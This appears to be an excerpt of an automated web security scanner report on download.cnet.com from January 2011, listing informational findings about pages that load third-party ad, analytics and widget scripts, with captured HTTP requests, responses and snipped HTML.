http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.c3p0.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.pagetools.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://platform.twitter.com/widgets.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:24 GMT
Via: HTTP/1.0 phx1-rb-dl-app7.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:24 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:24 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowLat=1294837284526; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:24 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:24 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:24 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:29 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:24 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=996
Connection: Keep-Alive
Content-Length: 75826

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>

<title>Android lands cloud se
...[SNIP]...


<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.c3p0.compressed.js"></script>
...[SNIP]...
</style> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.pagetools.compressed.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
<li class="shareYbuzz"><script showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">:http://download.cnet.com/8301-2007_4-20027809-12.html?tag=yahoobuzz</script>
...[SNIP]...
 <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.8. http://download.cnet.com/8301-2007_4-20027809-12.html/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027809-12.html/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5295.150723.CBSI/B4885922;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=17891&sg=489036&o=&h=cn&p=2&b=6&l=en_US&site=4&pt=9999&nd=&pid=&cid=&pp=100&e=3&rqid=00phx1-ad-e20:4D2D10307EB9A9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zMk5uAoOYI4AAHIGTIEAAAGU&t=2011.01.12.13.01.31&event=58/;ord=2011.01.12.13.01.31?
http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.31?
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js
http://i.i.com.com/cnwk.1d/html/js/rsi/dm_client_CNET.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.dfll.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js

Request

GET /8301-2007_4-20027809-12.html/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:01:31 GMT
Server: Apache/2.2
Vary: User-Agent,Host,Cookie
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=998
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 25461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">

<head>

...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/download/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/reviews/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.dfll.compressed.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
leclick.net/adi/N5295.150723.CBSI/B5081823;sz=728x90;ord=2011.01.12.13.01.31?" width="728" height="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.31?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zMk5uAoOYI4AAHIGTIEAAAGU&t=2011.01.12.13.01.31/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...
I4AAHIGTIEAAAGU&t=2011.01.12.13.01.31&event=58/;ord=2011.01.12.13.01.31?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B4885922;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=17891&sg=489036&o=&h=cn&p=2&b=6&l=en_US&site=4&pt=9999&nd=&pid=&cid=&pp=100&e=3&rqid=00phx1-ad-e20:4D2D10307EB9A9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zMk5uAoOYI4AAHIGTIEAAAGU&t=2011.01.12.13.01.31&event=58/;ord=2011.01.12.13.01.31?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zMk5uAoOYI4AAHIGTIEAAAGU&t=2011.01.12.13.01.31/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/js/rsi/dm_client_CNET.js"></script>
...[SNIP]...

16.9. http://download.cnet.com/8301-2007_4-20027865-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20027865-12.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=11501&sg=483566&o=20%253a2007%253aB12%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=8301&nd=2007&pid=&cid=20027865&pp=100&e=3&rqid=00phx1-ad-e20:4D2D10307EBAAC&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zNVgLAoOYI0AACOX2m4AAANK&t=2011.01.12.13.01.32&event=58/;ord=2011.01.12.13.01.32?
http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.32?
http://b.scorecardresearch.com/beacon.js
http://d.yimg.com/ds/badge.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.c3p0.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.pagetools.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://platform.twitter.com/widgets.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:32 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:32 GMT
Edge-Control: max-age=360
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:32 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowLat=1294837292036; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:32 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:32 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:32 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:37 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:32 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 64987

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head> <title>It's a black-and-white world: iPhone apps of the week | T
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.c3p0.compressed.js"></script>
...[SNIP]...
</style> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.pagetools.compressed.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
leclick.net/adi/N5295.150723.CBSI/B5081823;sz=728x90;ord=2011.01.12.13.01.32?" width="728" height="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.32?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zNVgLAoOYI0AACOX2m4AAANK&t=2011.01.12.13.01.32/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...
<li class="shareYbuzz"><script showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">:http://download.cnet.com/8301-2007_4-20027865-12.html?tag=yahoobuzz</script>
...[SNIP]...
I0AACOX2m4AAANK&t=2011.01.12.13.01.32&event=58/;ord=2011.01.12.13.01.32?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=11501&sg=483566&o=20%253a2007%253aB12%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=8301&nd=2007&pid=&cid=20027865&pp=100&e=3&rqid=00phx1-ad-e20:4D2D10307EBAAC&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zNVgLAoOYI0AACOX2m4AAANK&t=2011.01.12.13.01.32&event=58/;ord=2011.01.12.13.01.32?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zNVgLAoOYI0AACOX2m4AAANK&t=2011.01.12.13.01.32/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...
 <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.10. http://download.cnet.com/8618-2007_4-20027809.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8618-2007_4-20027809.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=17891&sg=483566&o=&h=cn&p=2&b=6&l=en_US&site=4&pt=9999&nd=&pid=&cid=&pp=100&e=3&rqid=01phx1-ad-e18:4D2CBDFA6ED3CC&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=43sQuwoOYI0AAHUTsSMAAAHe&t=2011.01.12.03.35.12&event=58/;ord=2011.01.12.03.35.12?
http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.03.35.12?
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js
http://i.i.com.com/cnwk.1d/html/js/rsi/dm_client_CNET.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.dfll.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js

Request

GET /8618-2007_4-20027809.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 502 Bad Gateway
Date: Wed, 12 Jan 2011 03:35:12 GMT
Server: Apache/2.2
Vary: User-Agent,Host,Cookie
Accept-Ranges: bytes
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=963
Connection: Keep-Alive
Content-Type: text/html
Expires: Wed, 12 Jan 2011 03:35:12 GMT
Content-Length: 25476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">

<head>

...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/download/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/reviews/default.css"/>
<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/commerce/commerce.tron.dfll.compressed.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
leclick.net/adi/N5295.150723.CBSI/B5081823;sz=728x90;ord=2011.01.12.03.35.12?" width="728" height="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.03.35.12?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=43sQuwoOYI0AAHUTsSMAAAHe&t=2011.01.12.03.35.12/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...
I0AAHUTsSMAAAHe&t=2011.01.12.03.35.12&event=58/;ord=2011.01.12.03.35.12?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=17891&sg=483566&o=&h=cn&p=2&b=6&l=en_US&site=4&pt=9999&nd=&pid=&cid=&pp=100&e=3&rqid=01phx1-ad-e18:4D2CBDFA6ED3CC&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=43sQuwoOYI0AAHUTsSMAAAHe&t=2011.01.12.03.35.12&event=58/;ord=2011.01.12.03.35.12?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=43sQuwoOYI0AAHUTsSMAAAHe&t=2011.01.12.03.35.12/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/js/rsi/dm_client_CNET.js"></script>
...[SNIP]...

16.11. http://download.cnet.com/download-blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/download-blog/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=11501&sg=483566&o=20%253a2007%253aB12%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=FD&nd=2007&pid=&cid=12&pp=100&e=3&rqid=01phx1-ad-e17:4D2D12AE7BF521&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zbgqHwoOYJAAAFpcWQoAAAGc&t=2011.01.12.13.01.46&event=58/;ord=2011.01.12.13.01.46?
http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.46?
http://b.scorecardresearch.com/beacon.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.bloglisting.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://platform.twitter.com/widgets.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:47 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:05:47 GMT
Cache-Control: max-age=240, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=240
Edge-Control: max-age=240
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:47 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowLat=1294837306898; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:47 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:47 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:47 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=954
Connection: Keep-Alive
Content-Length: 104182

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head> <title>Software news, tips and opinions from Download.com editor
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/news/news.tron.bloglisting.compressed.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
leclick.net/adi/N5295.150723.CBSI/B5081823;sz=728x90;ord=2011.01.12.13.01.46?" width="728" height="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.46?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zbgqHwoOYJAAAFpcWQoAAAGc&t=2011.01.12.13.01.46/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...
JAAAFpcWQoAAAGc&t=2011.01.12.13.01.46&event=58/;ord=2011.01.12.13.01.46?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=11501&sg=483566&o=20%253a2007%253aB12%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=FD&nd=2007&pid=&cid=12&pp=100&e=3&rqid=01phx1-ad-e17:4D2D12AE7BF521&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zbgqHwoOYJAAAFpcWQoAAAGc&t=2011.01.12.13.01.46&event=58/;ord=2011.01.12.13.01.46?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zbgqHwoOYJAAAFpcWQoAAAGc&t=2011.01.12.13.01.46/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...
 <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.12. http://download.cnet.com/mac/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/mac/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8688&sg=483566&o=19406%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=2000&nd=19406&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e20:4D2D10307ECAAC&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zdm4EgoOYI8AADTVkZIAAAMj&t=2011.01.12.13.01.49&event=58/;ord=2011.01.12.13.01.49?
http://b.scorecardresearch.com/beacon.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:49 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:06:58 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 51
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:49 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowLat=1294837309101; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
